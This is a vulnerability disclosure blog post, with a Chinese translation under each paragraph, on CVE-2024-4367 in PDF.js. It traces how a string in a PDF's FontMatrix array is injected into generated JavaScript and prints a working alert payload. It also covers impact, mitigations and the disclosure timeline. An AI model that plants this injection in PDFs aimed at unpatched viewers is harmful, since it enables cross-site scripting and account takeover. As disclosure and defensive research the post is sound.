TL;DR TL的;博士
This post details CVE-2024-4367, a vulnerability in PDF.js found by Codean Labs. PDF.js is a JavaScript-based PDF viewer maintained by Mozilla. This bug allows an attacker to execute arbitrary JavaScript code as soon as a malicious PDF file is opened. This affects all Firefox users (<126) because PDF.js is used by Firefox to show PDF files, but also seriously impacts many web- and Electron-based applications that (indirectly) use PDF.js for preview functionality.
这篇文章详细介绍了 CVE-2024-4367,这是 Codean Labs 发现的 PDF.js 漏洞。PDF.js是由Mozilla维护的基于JavaScript的PDF查看器。此漏洞允许攻击者在打开恶意 PDF 文件后立即执行任意 JavaScript 代码。这会影响所有 Firefox 用户 (<126),因为 Firefox 使用 PDF.js 来显示 PDF 文件,但也严重影响了许多基于 Web 和 Electron 的应用程序,这些应用程序(间接)使用 PDF.js 进行预览功能。
If you are a developer of a JavaScript/Typescript-based application that handles PDF files in any way, we recommend checking that you are not (indirectly) using a version a vulnerable version of PDF.js. See the end of this post for mitigation details.
如果您是基于 JavaScript/Typescript 的应用程序的开发人员,该应用程序以任何方式处理 PDF 文件,我们建议您检查您是否(间接)使用易受攻击的 PDF.js 版本。有关缓解详细信息,请参阅本文末尾。
Introduction 介绍
There are two common use-cases for PDF.js. First, it is Firefox’s built-in PDF viewer. If you use Firefox and you’ve ever downloaded or browsed to a PDF file you’ll have seen it in action. Second, it is bundled into a Node module called pdfjs-dist
, with ~2.7 million weekly downloads according to NPM. In this form, websites can use it to provide embedded PDF preview functionality. This is used by everything from Git-hosting platforms to note-taking applications. The one you’re thinking of now is likely using PDF.js.
PDF.js有两个常见的用例。首先,它是Firefox的内置PDF查看器。如果您使用 Firefox,并且曾经下载或浏览过 PDF 文件,那么您就会看到它的实际效果。其次,它被捆绑到一个名为 pdfjs-dist
的 Node 模块中,根据 NPM 的数据,每周下载量为 ~270 万次。在此表单中,网站可以使用它来提供嵌入式 PDF 预览功能。从 Git 托管平台到笔记应用程序,一切都使用它。你现在想到的那个可能正在使用PDF.js。
The PDF format is famously complex. With support for various media types, complicated font rendering and even rudimentary scripting, PDF readers are a common target for vulnerability researchers. With such a large amount of parsing logic, there are bound to be some mistakes, and PDF.js is no exception to this. What makes it unique however is that it is written in JavaScript as opposed to C or C++. This means that there is no opportunity for memory corruption problems, but as we will see it comes with its own set of risks.
PDF 格式是出了名的复杂。PDF 阅读器支持各种媒体类型、复杂的字体渲染甚至基本的脚本,是漏洞研究人员的常见目标。如此大量的解析逻辑,必然会有一些错误,PDF.js也不例外。然而,它的独特之处在于它是用JavaScript编写的,而不是C或C++。这意味着没有机会出现内存损坏问题,但正如我们将看到的那样,它有其自身的一系列风险。
Glyph rendering 字形呈现
You might be surprised to hear that this bug is not related to the PDF format’s (JavaScript!) scripting functionality. Instead, it is an oversight in a specific part of the font rendering code.
您可能会惊讶地发现,这个错误与PDF格式(JavaScript!)的脚本功能无关。相反,它是字体呈现代码特定部分的疏忽。
Fonts in PDFs can come in several different formats, some of them more obscure than others (at least for us). For modern formats like TrueType, PDF.js defers mostly to the browser’s own font renderer. In other cases, it has to manually turn glyph (i.e., character) descriptions into curves on the page. To optimize this for performance, a path generator function is pre-compiled for every glyph. If supported, this is done by making a JavaScript Function
object with a body (jsBuf
) containing the instructions that make up the path:
PDF 中的字体可以有几种不同的格式,其中一些比其他格式更晦涩难懂(至少对我们来说是这样)。对于像 TrueType 这样的现代格式,PDF.js主要遵循浏览器自己的字体呈现器。在其他情况下,它必须手动将字形(即字符)描述转换为页面上的曲线。为了优化性能,为每个字形预编译了路径生成器函数。如果支持,这是通过创建一个带有正文 ( jsBuf
) 的 JavaScript Function
对象来完成的,该对象包含构成路径的指令:
if (this.isEvalSupported && FeatureTest.isEvalSupported) {
const jsBuf = [];
for (const current of cmds) {
const args = current.args !== undefined ? current.args.join(",") : "";
jsBuf.push("c.", current.cmd, "(", args, ");\n");
}
console.log(jsBuf.join(""));
return (this.compiledGlyphs[character] = new Function(
"c",
"size",
jsBuf.join("")
));
}
From an attacker perspective this is really interesting: if we can somehow control these cmds
going into the Function
body and insert our own code, it would be executed as soon as such a glyph is rendered.
从攻击者的角度来看,这真的很有趣:如果我们能以某种方式控制这些 cmds
进入 Function
正文并插入我们自己的代码,那么一旦呈现这样的字形,它就会被执行。
Well, let’s look at how this list of commands is generated. Following the logic back to the CompiledFont
class we find the method compileGlyph(...)
. This method initializes the cmds
array with a few general commands (save
, transform
, scale
and restore
), and defers to a compileGlyphImpl(...)
method to fill in the actual rendering commands:
好吧,让我们看看这个命令列表是如何生成的。按照逻辑回到类, CompiledFont
我们找到方法 compileGlyph(...)
。此方法使用一些常规命令 ( , , 和 ) 初始化 cmds
数组,并遵循填充实际渲染命令 compileGlyphImpl(...)
的方法: restore
scale
transform
save
compileGlyph(code, glyphId) {
if (!code || code.length === 0 || code[0] === 14) {
return NOOP;
}
let fontMatrix = this.fontMatrix;
...
const cmds = [
{ cmd: "save" },
{ cmd: "transform", args: fontMatrix.slice() },
{ cmd: "scale", args: ["size", "-size"] },
];
this.compileGlyphImpl(code, cmds, glyphId);
cmds.push({ cmd: "restore" });
return cmds;
}
If we instrument the PDF.js code to log generated Function
objects, we see that the generated code indeed contains those commands:
如果我们检测PDF.js代码来记录生成 Function
的对象,我们会看到生成的代码确实包含这些命令:
c.save();
c.transform(0.001,0,0,0.001,0,0);
c.scale(size,-size);
c.moveTo(0,0);
c.restore();
At this point we could audit the font parsing code and the various commands and arguments that can be produced by glyphs, like quadraticCurveTo
and bezierCurveTo
, but all of this seems pretty innocent with no ability to control anything other than numbers. What turns out to be much more interesting however is the transform
command we saw above:
在这一点上,我们可以审核字体解析代码以及字形可以产生的各种命令和参数,例如 quadraticCurveTo
和 bezierCurveTo
,但所有这些似乎都非常无辜,除了数字之外,无法控制任何东西。然而,更有趣的是我们在上面看到 transform
的命令:
{ cmd: "transform", args: fontMatrix.slice() },
This fontMatrix
array is copied (with .slice()
) and inserted into the body of the Function
object, joined by commas. The code clearly assumes that it is a numeric array, but is that always the case? Any string inside this array would be inserted literally, without any quotes surrounding it. Hence, that would break the JavaScript syntax at best, and give arbitrary code execution at worst. But can we even control the contents of fontMatrix
to that degree?
此 fontMatrix
数组被复制(使用 .slice()
)并插入到 Function
对象的主体中,并用逗号连接。代码清楚地假设它是一个数值数组,但情况总是如此吗?此数组中的任何字符串都将按字面意思插入,周围没有任何引号。因此,这充其量会破坏 JavaScript 语法,最坏的情况是会执行任意代码。但是,我们甚至可以控制这种程度的内容 fontMatrix
吗?
Enter the FontMatrix 输入 FontMatrix
The value of fontMatrix
defaults to [0.001, 0, 0, 0.001, 0, 0]
, but is often set to a custom matrix by a font itself, i.e., in its own embedded metadata. How this is done exactly differs per font format. Here’s the Type1 parser for example:
的 fontMatrix
值默认为 [0.001, 0, 0, 0.001, 0, 0]
,但通常由字体本身(即在其自己的嵌入元数据中)设置为自定义矩阵。具体操作方式因字体格式而异。下面是 Type1 解析器示例:
extractFontHeader(properties) {
let token;
while ((token = this.getToken()) !== null) {
if (token !== "/") {
continue;
}
token = this.getToken();
switch (token) {
case "FontMatrix":
const matrix = this.readNumberArray();
properties.fontMatrix = matrix;
break;
...
}
...
}
...
}
This is not very interesting for us. Even though Type1 fonts technically contain arbitrary Postscript code in their header, no sane PDF reader supports this fully and most just try to read predefined key-value pairs with expected types. In this case, PDF.js just reads a number array when it encounters a FontMatrix
key. It appears that the CFF
parser — used for several other font formats — is similar in this regard. All in all, it looks like we are indeed limited to numbers.
这对我们来说不是很有趣。尽管从技术上讲,Type1 字体的标题中包含任意的 Postscript 代码,但没有一个理智的 PDF 阅读器完全支持这一点,大多数只是尝试读取具有预期类型的预定义键值对。在这种情况下,PDF.js 只是在遇到 FontMatrix
键时读取一个数字数组。似乎用于其他几种字体格式的 CFF
解析器在这方面是相似的。总而言之,看起来我们确实仅限于数字。
However, it turns out that there is more than one potential origin of this matrix. Apparently, it is also possible to specify a custom FontMatrix
value outside of a font, namely in a metadata object in the PDF! Looking carefully at the PartialEvaluator.translateFont(...)
method, we see that it loads various attributes from PDF dictionaries associated with the font, one of them being the fontMatrix
:
然而,事实证明,这个矩阵有不止一个潜在的起源。显然,也可以在字体之外指定自定义 FontMatrix
值,即在 PDF 的元数据对象中!仔细观察该 PartialEvaluator.translateFont(...)
方法,我们发现它从与字体关联的 PDF 字典中加载了各种属性,其中之一是 fontMatrix
:
const properties = {
type,
name: fontName.name,
subtype,
file: fontFile,
...
fontMatrix: dict.getArray("FontMatrix") || FONT_IDENTITY_MATRIX,
...
bbox: descriptor.getArray("FontBBox") || dict.getArray("FontBBox"),
ascent: descriptor.get("Ascent"),
descent: descriptor.get("Descent"),
xHeight: descriptor.get("XHeight") || 0,
capHeight: descriptor.get("CapHeight") || 0,
flags: descriptor.get("Flags"),
italicAngle: descriptor.get("ItalicAngle") || 0,
...
};
In the PDF format, font definitions consists of several objects. The Font
, its FontDescriptor
and the actual FontFile
. For example, here represented by objects 1, 2 and 3:
在 PDF 格式中,字体定义由多个对象组成。的 Font
、 它 FontDescriptor
和 实际 FontFile
的 .例如,这里由对象 1、2 和 3 表示:
1 0 obj
<<
/Type /Font
/Subtype /Type1
/FontDescriptor 2 0 R
/BaseFont /FooBarFont
>>
endobj
2 0 obj
<<
/Type /FontDescriptor
/FontName /FooBarFont
/FontFile 3 0 R
/ItalicAngle 0
/Flags 4
>>
endobj
3 0 obj
<<
/Length 100
>>
... (actual binary font data) ...
endobj
The dict
referenced by the code above refers to the Font
object. Hence, we should be able to define a custom FontMatrix
array like this:
上面代码 dict
引用的对象 Font
。因此,我们应该能够定义一个自定义 FontMatrix
数组,如下所示:
1 0 obj
<<
/Type /Font
/Subtype /Type1
/FontDescriptor 2 0 R
/BaseFont /FooBarFont
/FontMatrix [1 2 3 4 5 6]
>>
endobj
When attempting to do this it initially looks like this doesn’t work, as the transform
operations in generated Function
bodies still use the default matrix. However, this happens because the font file itself is overwriting the value. Luckily, when using a Type1 font without an internal FontMatrix
definition, the PDF-specified value is authoritative as the fontMatrix
value is not overwritten.
当尝试这样做时,最初看起来这不起作用,因为生成 Function
的正文中的 transform
操作仍然使用默认矩阵。但是,发生这种情况是因为字体文件本身正在覆盖该值。幸运的是,当使用没有内部 FontMatrix
定义的 Type1 字体时,PDF 指定的值是权威的,因为该 fontMatrix
值不会被覆盖。
Now that we can control this array from a PDF object we have all the flexibility we want, as PDF supports more than just number-type primitives. Let’s try inserting a string-type value instead of a number (in PDF, strings are delimited by parentheses):
现在我们可以从 PDF 对象控制这个数组,我们拥有了我们想要的所有灵活性,因为 PDF 支持的不仅仅是数字类型的基元。让我们尝试插入一个字符串类型的值而不是一个数字(在 PDF 中,字符串用括号分隔):
/FontMatrix [1 2 3 4 5 (foobar)]
And indeed, it is plainly inserted into the Function
body!
事实上,它显然是插入 Function
体内的!
c.save();
c.transform(1,2,3,4,5,foobar);
c.scale(size,-size);
c.moveTo(0,0);
c.restore();
Exploitation and impact 利用和影响
Inserting arbitrary JavaScript code is now only a matter of juggling the syntax properly. Here’s a classical example triggering an alert, by first closing the c.transform(...)
function, and making use of the trailing parenthesis:
插入任意 JavaScript 代码现在只需正确处理语法即可。下面是一个触发警报的经典示例,首先关闭 c.transform(...)
函数,并使用尾部括号:
/FontMatrix [1 2 3 4 5 (0\); alert\('foobar')]
The result is exactly as expected:
结果与预期完全一致:
Exploitation of CVE-2024-4367
CVE-2024-4367 的漏洞利用
You can find a proof-of-concept PDF file here. It is made to be easy to adapt using a regular text editor. To demonstrate the context in which the JavaScript is running, the alert will show you the value of window.origin
. Interestingly enough, this is not the file://
path you see in the URL bar (if you’ve downloaded the file). Instead, PDF.js runs under the origin resource://pdf.js
. This prevents access to local files, but it is slightly more privileged in other aspects. For example, it is possible to invoke a file download (through a dialog), even to “download” arbitrary file://
URLs. Additionally, the real path of the opened PDF file is stored in window.PDFViewerApplication.url
, allowing an attacker to spy on people opening a PDF file, learning not just when they open the file and what they’re doing with it, but also where the file is located on their machine.
您可以在此处找到概念验证 PDF 文件。它很容易使用常规文本编辑器进行调整。为了演示运行 JavaScript 的上下文,警报将显示 的 window.origin
值。有趣的是,这不是您在 URL 栏中看到的 file://
路径(如果您已下载文件)。相反,PDF.js 在原点 resource://pdf.js
.这阻止了对本地文件的访问,但它在其他方面略有特权。例如,可以调用文件下载(通过对话框),甚至可以“下载”任意 file://
URL。此外,打开的 PDF 文件的真实路径存储在 window.PDFViewerApplication.url
,允许攻击者监视打开 PDF 文件的人,不仅了解他们何时打开文件以及他们正在处理它,还了解文件在其计算机上的位置。
In applications that embed PDF.js, the impact is potentially even worse. If no mitigations are in place (see below), this essentially gives an attacker an XSS primitive on the domain which includes the PDF viewer. Depending on the application this can lead to data leaks, malicious actions being performed in the name of a victim, or even a full account take-over. On Electron apps that do not properly sandbox JavaScript code, this vulnerability even leads to native code execution (!). We found this to be the case for at least one popular Electron app.
在嵌入PDF.js的应用程序中,影响可能更严重。如果没有采取任何缓解措施(见下文),这实质上会为攻击者提供包括 PDF 查看器在内的域上的 XSS 原语。根据应用程序的不同,这可能会导致数据泄露、以受害者的名义执行恶意操作,甚至导致完全帐户接管。在未正确沙盒 JavaScript 代码的 Electron 应用程序上,此漏洞甚至会导致本机代码执行 (!我们发现至少有一个流行的 Electron 应用程序就是这种情况。
Mitigation 缓解
At Codean Labs we realize it is difficult to keep track of dependencies like this and their associated risks. It is our pleasure to take this burden from you. We perform application security assessments in an efficient, thorough and human manner, allowing you to focus on development. Click here to learn more.
在Codean Labs,我们意识到很难跟踪这样的依赖关系及其相关风险。我们很高兴能从您那里接过这个重担。我们以高效、彻底和人性化的方式执行应用程序安全评估,让您专注于开发。点击这里了解更多。
The best mitigation against this vulnerability is to update PDF.js to version 4.2.67 or higher. Most wrapper libraries like react-pdf
have also released patched versions. Because some higher level PDF-related libraries statically embed PDF.js, we recommend recursively checking your node_modules
folder for files called pdf.js
to be sure. Headless use-cases of PDF.js (e.g., on the server-side to obtain statistics and data from PDFs) seem not to be affected, but we didn’t thoroughly test this. It is also advised to update.
针对此漏洞的最佳缓解方法是将PDF.js更新到版本 4.2.67 或更高版本。大多数包装库 react-pdf
也发布了补丁版本。由于某些更高级别的 PDF 相关库静态嵌入PDF.js,因此我们建议以递归方式检查文件夹 node_modules
中是否存在被调用 pdf.js
的文件。PDF.js的无头用例(例如,在服务器端从 PDF 中获取统计数据和数据)似乎不受影响,但我们没有对此进行彻底测试。还建议更新。
Additionally, a simple workaround is to set the PDF.js setting isEvalSupported
to false
. This will disable the vulnerable code-path. If you have a strict content-security policy (disabling the use of eval
and the Function
constructor), the vulnerability is also not reachable.
此外,一个简单的解决方法是将PDF.js设置 isEvalSupported
设置为 false
。这将禁用易受攻击的代码路径。如果您有严格的内容安全策略(禁用 eval
和 构造 Function
函数),则也无法访问该漏洞。
Timeline 时间线
- 2024-04-26 – vulnerability disclosed to Mozilla
2024-04-26 – 向 Mozilla 披露漏洞
- 2024-04-29 – PDF.js v4.2.67 released to NPM, fixing the issue
2024-04-29 – PDF.js v4.2.67 发布到 NPM,修复了问题
- 2024-05-14 – Firefox 126, Firefox ESR 115.11 and Thunderbird 115.11 released including the fixed version of PDF.js
2024-05-14 – Firefox 126、Firefox ESR 115.11 和 Thunderbird 115.11 发布,包括 PDF.js 的修复版本
- 2024-05-20 – publication of this blogpost
2024-05-20 – 这篇博文的发布